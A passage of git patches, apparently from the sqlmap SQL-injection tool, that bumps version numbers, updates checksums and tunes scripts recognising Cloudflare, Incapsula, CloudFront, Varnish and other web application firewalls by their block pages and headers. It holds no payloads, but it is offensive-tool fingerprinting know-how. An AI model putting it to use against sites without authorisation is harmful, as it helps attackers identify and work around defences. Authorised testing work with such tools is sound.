TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8f078653ca4..9e42d80e76f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -85ca5478dc2bd9db40772e52dad2f84a extra/wafdetectify/wafdetectify.py +5a5d4305e9dd22c3ba06b8587dad9db7 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -13758369fddb4d7e791e989966908ee6 lib/core/settings.py +d30a78044622a9f97a2b62eec4c62e95 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From 62a361835353f2478d8ef04e7db244c204153b89 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 15:50:17 +0200 Subject: [PATCH 249/428] Minor patches --- extra/wafdetectify/wafdetectify.py | 1 + lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- waf/kona.py | 2 +- 4 files changed, 6 insertions(+), 5 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index e927756133a..248a009e77d 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -48,6 +48,7 @@ def get_page(get=None, url=None, host=None, data=None): except Exception, ex: code = getattr(ex, "code", None) page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "") + headers = ex.info() if hasattr(ex, "info") else {} result = CACHE[key] = page, headers, code diff --git a/lib/core/settings.py b/lib/core/settings.py index 54e7c282ff8..0c597f443fd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.26" +VERSION = "1.2.8.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9e42d80e76f..0bc9adaace2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -5a5d4305e9dd22c3ba06b8587dad9db7 extra/wafdetectify/wafdetectify.py +0142de525def5e3f17092dcc1ed67c95 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d30a78044622a9f97a2b62eec4c62e95 lib/core/settings.py +fe3bc1dc84fcdfc26e552984f6c4b139 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -422,7 +422,7 @@ ade1299c435db7b9e35cf1166ed9d859 waf/generic.py 30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py 898f53c12133da3e946301f4aa97d538 waf/knownsec.py -81e6bf619c7bb73c4b62e2439e60e95a waf/kona.py +15a50edd48961ea168648a370f42e123 waf/kona.py b17a154fe7959619eaafffa60e14199f waf/modsecurity.py d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py diff --git a/waf/kona.py b/waf/kona.py index 47824f0198d..f24702411d0 100644 --- a/waf/kona.py +++ b/waf/kona.py @@ -17,7 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = code in (400, 403, 501) and re.search(r"Reference #[0-9a-f.]+", page or "", re.I) is not None + retval = code in (400, 403, 501) and all(_ in (page or "") for _ in ("Access Denied", "You don't have permission to access", "on this server", "Reference")) retval |= re.search(r"AkamaiGHost", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None if retval: break From 287371337d9bc0b3f2386880103abf4716ea870c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 15:56:13 +0200 Subject: [PATCH 250/428] Update of ZENEDGE WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/zenedge.py | 3 ++- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0c597f443fd..bbd640edbf5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.27" +VERSION = "1.2.8.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0bc9adaace2..bad941e706a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fe3bc1dc84fcdfc26e552984f6c4b139 lib/core/settings.py +676dac9284820f0949ec1f63e8827c4b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -457,7 +457,7 @@ f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py 11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py 68e332530fab216d017ede506c3fec2f waf/yundun.py bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py -705ac8663513c12150cb5623ef4a04fb waf/zenedge.py +47f8f6623841232a93c5229d6c1bebfe waf/zenedge.py dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml 7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml diff --git a/waf/zenedge.py b/waf/zenedge.py index 82d367cfa31..b5b3e0fb39c 100644 --- a/waf/zenedge.py +++ b/waf/zenedge.py @@ -16,8 +16,9 @@ def detect(get_page): retval = False for vector in WAF_ATTACK_VECTORS: - _, headers, code = get_page(get=vector) + page, headers, code = get_page(get=vector) retval = code >= 400 and re.search(r"\AZENEDGE", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + retval |= all(_ in (page or "") for _ in ("Your request has been blocked", "Incident ID", "/__zenedge/assets/")) if retval: break From 014978cebccfd123490e2f59a546eea9e066da2f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:00:40 +0200 Subject: [PATCH 251/428] Fine tuning Cloudflare WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/cloudflare.py | 3 ++- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bbd640edbf5..2e014209d7d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.28" +VERSION = "1.2.8.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bad941e706a..bb317f4b1aa 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -676dac9284820f0949ec1f63e8827c4b lib/core/settings.py +06f18a0602e49a4b14f4096feea04e4b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -404,7 +404,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -feda0f2a5172325f39e8e3e38c45f73d waf/cloudflare.py +5987ef1e3f368f1f6cf5dad341db7159 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py diff --git a/waf/cloudflare.py b/waf/cloudflare.py index 7e738bb4726..c2e8cdf5524 100644 --- a/waf/cloudflare.py +++ b/waf/cloudflare.py @@ -17,12 +17,13 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = re.search(r"cloudflare", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None if code >= 400: + retval |= re.search(r"cloudflare", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None retval |= re.search(r"\A__cfduid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= headers.get("cf-ray") is not None retval |= re.search(r"CloudFlare Ray ID:|var CloudFlare=", page or "") is not None + retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Please complete the security check to access")) if retval: break From aefb815064c8019db98598e0ea05072f6365afe4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:02:27 +0200 Subject: [PATCH 252/428] Cutting down FP on Varnish WAF (ignoring Varnish Cache) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/varnish.py | 5 +---- 3 files changed, 4 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2e014209d7d..895005a8c51 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.29" +VERSION = "1.2.8.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bb317f4b1aa..71f83400eea 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -06f18a0602e49a4b14f4096feea04e4b lib/core/settings.py +b5062827268f92056e6f87e3e03df5f6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -449,7 +449,7 @@ dffa9cebad777308714aaf83b71635b4 waf/teros.py b37210459a13de40bf07722c4d032c33 waf/trafficshield.py fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py a687449cd4e45f69e33b13d41e021480 waf/uspses.py -f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py +ab329be0231efdd360ebabd24c0e5315 waf/varnish.py 20840afc269920826deac2b6c00d6b9c waf/wallarm.py 11205abf397ae9072adc3234b656ade9 waf/watchguard.py 9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py diff --git a/waf/varnish.py b/waf/varnish.py index a1384d6eac2..62965755bdf 100644 --- a/waf/varnish.py +++ b/waf/varnish.py @@ -17,10 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = headers.get("X-Varnish") is not None - retval |= re.search(r"varnish\Z", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None - retval |= re.search(r"varnish", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None - retval |= code == 404 and re.search(r"\bXID: \d+", page or "") is not None + retval = code == 404 and re.search(r"\bXID: \d+", page or "") is not None retval |= code >= 400 and "Request rejected by xVarnish-WAF" in (page or "") if retval: break From db327a85383132aefe2fc6f508f2a2470722b780 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:19:31 +0200 Subject: [PATCH 253/428] Minor update of WAF scripts --- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- waf/asm.py | 1 + waf/cloudflare.py | 1 + 4 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 895005a8c51..5dd603c60ea 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.30" +VERSION = "1.2.8.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 71f83400eea..0047057a182 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b5062827268f92056e6f87e3e03df5f6 lib/core/settings.py +6f054fe13c3a24d17c82b35c96ca0ed0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -395,7 +395,7 @@ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqlud a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py -dec64f18c23962d279cc1cde6469afed waf/asm.py +2fe5335fde7a7f5b19d2f363a55ce805 waf/asm.py 6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py ef722d062564def381b1f96f5faadee3 waf/baidu.py 07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py @@ -404,7 +404,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -5987ef1e3f368f1f6cf5dad341db7159 waf/cloudflare.py +94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py diff --git a/waf/asm.py b/waf/asm.py index 330579ad50b..9bfb31371c4 100644 --- a/waf/asm.py +++ b/waf/asm.py @@ -15,6 +15,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, _, _ = get_page(get=vector) retval = "The requested URL was rejected. Please consult with your administrator." in (page or "") + retval |= all(_ in (page or "") for _ in ("This page can't be displayed. Contact support for additional information", "The incident ID is:")) if retval: break diff --git a/waf/cloudflare.py b/waf/cloudflare.py index c2e8cdf5524..e38f48e291d 100644 --- a/waf/cloudflare.py +++ b/waf/cloudflare.py @@ -24,6 +24,7 @@ def detect(get_page): retval |= headers.get("cf-ray") is not None retval |= re.search(r"CloudFlare Ray ID:|var CloudFlare=", page or "") is not None retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Please complete the security check to access")) + retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Sorry, you have been blocked")) if retval: break From dc01f2e77358d801d076c6cddf32670fdbc3ab8d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:42:35 +0200 Subject: [PATCH 254/428] Fine tuning of Cloudfrount WAF script (less FP) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/cloudfront.py | 3 +-- 3 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5dd603c60ea..24739a97840 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.31" +VERSION = "1.2.8.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0047057a182..f8a7cf81bbd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6f054fe13c3a24d17c82b35c96ca0ed0 lib/core/settings.py +d4926186bd8f94eb38b5daf98f1cd67d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -405,7 +405,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py -b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py +8c8344b4f7e97c31f130f3d48da9b393 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py diff --git a/waf/cloudfront.py b/waf/cloudfront.py index 5969befe411..afc085e1e5f 100644 --- a/waf/cloudfront.py +++ b/waf/cloudfront.py @@ -18,8 +18,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: _, headers, _ = get_page(get=vector) - retval |= re.search(r"cloudfront", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None - retval |= re.search(r"cloudfront", headers.get("X-Cache", ""), re.I) is not None + retval = re.search(r"Error from cloudfront", headers.get("X-Cache", ""), re.I) is not None retval |= headers.get("X-Amz-Cf-Id") is not None if retval: From 578c41f6deef721eb290c33cc6961db1f956dac7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:49:06 +0200 Subject: [PATCH 255/428] Fine tuning Incapsula WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/incapsula.py | 3 ++- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 24739a97840..d7e1f3538d0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.32" +VERSION = "1.2.8.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f8a7cf81bbd..8d83ff47fe7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d4926186bd8f94eb38b5daf98f1cd67d lib/core/settings.py +75a03c25cb625ee451394fea1fc4d7a6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -417,7 +417,7 @@ aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py ade1299c435db7b9e35cf1166ed9d859 waf/generic.py 1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -51aed66945f95641cb45c840e7132e3b waf/incapsula.py +0359ca07b6e3ee0e4505ad5bfaa1de79 waf/incapsula.py 1e5532ede194ac9c083891c2f02bca93 waf/__init__.py 30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py diff --git a/waf/incapsula.py b/waf/incapsula.py index babf1d59ba6..c5e299057cb 100644 --- a/waf/incapsula.py +++ b/waf/incapsula.py @@ -19,7 +19,8 @@ def detect(get_page): page, headers, _ = get_page(get=vector) retval = re.search(r"incap_ses|visid_incap", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= re.search(r"Incapsula", headers.get("X-CDN", ""), re.I) is not None - retval |= any(_ in (page or "") for _ in ("Incapsula incident ID", "_Incapsula_Resource?")) + retval |= any(_ in (page or "") for _ in ("Incapsula incident ID", "_Incapsula_Resource?", "?subject=WAF Block Page:")) + retval |= all(_ in (page or "") for _ in ("Application Firewall Error", "If you feel you have been blocked in error, please contact Customer Support")) retval |= headers.get("X-Iinfo") is not None if retval: break From a831865633ec1b0bbacfdb15dd173248e56d791a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 17:44:37 +0200 Subject: [PATCH 256/428] Further narrowing down cloudfront WAF script (less FP on detection) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/cloudfront.py | 1 - 3 files changed, 3 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d7e1f3538d0..00cad70c111 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.33" +VERSION = "1.2.8.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8d83ff47fe7..0718b14866b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -75a03c25cb625ee451394fea1fc4d7a6 lib/core/settings.py +11c6b10e7e997c019a0837d1de1f23c0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -405,7 +405,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py -8c8344b4f7e97c31f130f3d48da9b393 waf/cloudfront.py +29ba81741fd7e220a95fe7c5fae76e1a waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py diff --git a/waf/cloudfront.py b/waf/cloudfront.py index afc085e1e5f..d7ddc807ed4 100644 --- a/waf/cloudfront.py +++ b/waf/cloudfront.py @@ -19,7 +19,6 @@ def detect(get_page): _, headers, _ = get_page(get=vector) retval = re.search(r"Error from cloudfront", headers.get("X-Cache", ""), re.I) is not None - retval |= headers.get("X-Amz-Cf-Id") is not None if retval: break From 43c9e21c563d236d9c7d55d3147c7616f34cacb3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 22:39:07 +0200 Subject: [PATCH 257/428] Performance improvement and reducing number of false-positives in heavily dynamic pages --- lib/core/settings.py | 2 +- lib/request/comparison.py | 6 +++++- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 00cad70c111..bdac7948476 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.34" +VERSION = "1.2.9.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/comparison.py b/lib/request/comparison.py index bd8612d99dc..146150ac92c 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -137,10 +137,14 @@ def _comparison(page, headers, code, getRatioValue, pageLength): seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") + if kb.heavilyDynamic: + seq1 = seq1.split("\n") + seq2 = seq2.split("\n") + seqMatcher.set_seq1(seq1) seqMatcher.set_seq2(seq2) - ratio = round(seqMatcher.quick_ratio(), 3) + ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3) # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0718b14866b..65e05f8f69e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -11c6b10e7e997c019a0837d1de1f23c0 lib/core/settings.py +bdb6b2b1b842c4f5e2874fe3a199f648 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -71,7 +71,7 @@ f2af274126ce0a789027d35d367f2b9e 